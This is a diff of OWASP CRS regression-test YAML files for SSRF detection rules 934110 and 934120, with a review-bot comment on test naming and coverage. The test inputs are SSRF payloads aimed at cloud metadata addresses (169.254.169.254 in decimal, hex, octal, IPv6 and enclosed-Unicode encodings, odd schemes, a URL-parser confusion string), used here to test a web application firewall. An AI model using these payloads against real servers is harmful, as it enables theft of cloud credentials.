- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal"
- version: "HTTP/1.1"
- output:
- no_log_contains: id "934110"
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get/test?ssrf=http%3A%2F%2Fmetadata.google.internal"
+ version: "HTTP/1.1"
+ output:
+ log:
+ no_expect_ids: [934110]
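Review bot: Tests 6 and 7 carry the identical description `SSRF - negative test aws`, and this file has no positive AWS IMDS case at all, so a regression in matching `http://169.254.169.254/latest/meta-data/` would not be caught here while the two negatives only pin what must stay silent (a scheme-less host in test 6, a bare `/latest` path in test 7). Suggest distinct descriptions, e.g. `desc: SSRF - negative test aws, no scheme` and `desc: SSRF - negative test aws, /latest without meta-data or user-data`, and, if 934110 is meant to cover AWS (not verifiable from this hunk), an extra positive `test_id: 9` with `uri: "/get/test?ssrf=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F"` and `expect_ids: [934110]`. Test 2's `digitalcloud` appears to refer to DigitalOcean (the `/metadata/v1.json` endpoint); renaming it `SSRF - check digitalocean url` would make failure output unambiguous. Note that `no_expect_ids` asserts only that 934110 did not fire, the same guarantee the old `no_log_contains` gave, so the negatives still say nothing about other rules on these requests.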
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
index d39766afd..697f26b79 100644
--- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
+++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
@@ -1,891 +1,889 @@
 ---
 meta:
 author: "fzipitria, Max Leske, azurit"
- enabled: true
- name: "934120.yaml"
- description: "Description"
+rule_id: 934120
 tests:
- - test_title: 934120-1
+ - test_id: 1
 desc: SSRF - IPv4, Dotless decimal
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://2852039166/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-2
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://2852039166/"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934120]
+ - test_id: 2
 desc: SSRF - IPv4, Dotless decimal with overflow
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- Accept-Encoding: gzip,deflate
- Accept-Language: en-us,en;q=0.5
- method: GET
- uri: "/get?ssrf=http://7147006462/"
- version: "HTTP/1.1"
- output:
- log_contains: id "934120"
- - test_title: 934120-3
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ method: GET
+ uri: "/get?ssrf=http://7147006462/"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [934120]
+ - test_id: 3 desc: SSRF - IPv4, Dotted hexadecimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0xA9.0xFE.0xA9.0xFE/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 4 desc: SSRF - IPv4, Dotless hexadecimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0xA9FEA9FE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0xA9FEA9FE/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 5 desc: SSRF - IPv4, Dotless hexadecimal with overflow stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0x41414141A9FEA9FE/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0x41414141A9FEA9FE/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 6 desc: SSRF - IPv4, Dotted octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0251.0376.0251.0376/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0251.0376.0251.0376/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 7 desc: SSRF - IPv4, Dotted octal with padding stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://0251.00376.000251.0000376/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://0251.00376.000251.0000376/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 8 desc: SSRF - IPv4, dotted, two bytes decimal, two bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169.254.43518/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169.254.43518/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 9 desc: SSRF - IPv4, dotted, one byte decimal, three bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: 
"/get?ssrf=http://169.16689662/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169.16689662/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 10 desc: SSRF - IPv6, first 10 bytes compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 11 desc: SSRF - IPV6 Expanded stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-12 + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 12 desc: SSRF - IPV6 Expanded - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 13 desc: SSRF - Dotless decimal - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=2852039166" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=2852039166" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 14 desc: SSRF - Dotless hexadecimal with overflow - Negative tests stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=0x41414141A9FEA9FE" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=0x41414141A9FEA9FE" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 15 desc: SSRF - Negative tests - IPv4, dotted, one byte decimal, three bytes octal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=169.16689662" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: 
gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=169.16689662" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 16 desc: SSRF - Negative tests - IPV6 Compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[::ffff:a9fe:a9fe" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[::ffff:a9fe:a9fe" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 17 desc: SSRF - Negative tests - IPV6 Compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[::ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - 
test_id: 18 desc: SSRF - Negative tests - IPV6 Expanded stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 19 desc: SSRF - Negative tests - IPV6/IPV4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - no_log_contains: id "934120" - - test_title: 934120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 20 desc: SSRF - Evasion technique 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A%2F%2Fgoogle.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 21 desc: SSRF - Weird protocol scheme 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 22 desc: SSRF - Weird protocol scheme 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 23 desc: SSRF - Enclosed alphanumerics 1 - digits stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 24 desc: SSRF - Enclosed alphanumerics 2 - digits stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 25 desc: SSRF - Enclosed alphanumerics 3 - text stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 26 desc: SSRF - Enclosed alphanumerics 3 - text stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - 
method: GET - uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 27 desc: SSRF - 8-Bit Octal conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=ssh://0177.00.00.01" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=ssh://0177.00.00.01" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 28 desc: SSRF - 32-Bit Octal conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=rtmp://017700000001" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: 
